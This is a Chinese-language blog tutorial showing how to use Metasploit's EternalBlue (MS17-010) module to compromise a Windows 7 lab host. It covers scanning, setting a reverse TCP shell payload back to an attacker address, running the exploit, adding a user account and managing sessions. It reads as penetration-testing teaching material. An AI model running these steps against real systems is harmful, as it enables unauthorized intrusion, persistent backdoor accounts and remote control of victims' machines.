实战-使用msf渗透攻击win7主机并远程执行命令

1.什么是永恒之蓝?

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

2.通过msf模块获取win7主机远程shell

模块的整体使用流程如下

1.我们先扫描目标是否存在ms17-010漏洞

 2.加载对应的模块

 3.查看需要设置的参数

show options

4.设置目标主机

5.开始扫描,run运行

 如图,我们可以确定目标是脆弱的,系统里有ms17-010漏洞。

 6.查找攻击模块

 7.加载攻击模块

8.查看需要设置的参数

9.设置目标主机

 10.查看该攻击载荷使用的系统类型show targets

如图,可以看出永恒之蓝可以针对win7和server 2008操作系统。

 11.查看该模块可以使用的攻击载荷 show payloads

 12.选择攻击模块 show windows/x64/shell

 13.设置攻击载荷 set payload windows/x64/shell/reverse_tcp

14.设置本地主机 set LHOST 192.168.0.109

15.查看设置参数

 16.run运行

如图,渗透成功。

17.执行一些命令去测试一下

添加一个账号 

 在win7系统里查看用户。如图,添加成功。

 但是,我们在终端模拟器里看到一些乱码。

 原因是:一个是linux系统,一个是windows系统,编码方式不一样。

解决办法:chcp 65001

 查看我们的权限。

如图,可以看到我们是系统最高权限及root权限。

 终端会话:ctrl+c

 拿到会话后,我们将其保存到后台 exploit -j

 此时,会话保存到后台了。我们输入sessions,进行查看。

 记录会话 sessions -i 4

 退出但不断开这个链接 background

 删除会话 sessions -k 4

 3.总结使用metasploit攻击的步骤

1.查找CVE公布的漏洞

2.查找对应的exploit模块

3.配置模块参数

4.添加payload后门

5.执行exploit开始攻击

  • 7
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

保持微笑-泽

谢谢鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值